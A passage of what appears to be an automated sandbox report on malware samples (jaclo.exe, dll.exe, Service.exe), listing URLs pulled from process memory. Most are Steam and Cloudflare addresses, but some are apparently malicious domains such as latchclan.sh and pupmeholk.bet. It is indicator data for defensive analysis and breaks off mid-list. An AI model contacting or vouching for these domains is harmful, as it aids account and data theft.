                                                                                                                                        https://store.steampowered.com/privacy_agreement/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=englijaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/imagsMdll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/Xjaclo.exe, 0000000D.00000002.1400600163.0000000001325000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=englidll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngjaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbjaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.clodll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://latchclan.shjaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.google.com/recaptcha/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://checkout.steampowered.com/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://api.pifkService.exe, 00000016.00000002.2512379907.0000006EFF6F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2512372468.000000CD352F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512378824.000000B1744F9000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bjaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampdll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngjaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.enigmaprotector.com/dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://gemini.google.com/app?q=dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/;jaclo.exe, 0000000D.00000003.1385496112.000000000137B000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1398064042.000000000137A000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612242339.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436290691.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/about/dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.cloudflare.steamstatic.com/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/my/wishlist/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://pupmeholk.bet/dll.exe, 00000010.00000003.1553180293.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000122F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://api.ipify.org/erService.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamloopback.hostdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbdll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://help.steampowered.com/en/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://api.ipify.org/5GService.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/market/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/news/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://www.enigmaprotector.com/openUjaclo.exe, 0000000D.00000002.1400014459.0000000000BFE000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steamcommunity.com/(dll.exe, 00000010.00000002.1613070327.0000000004000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgjaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 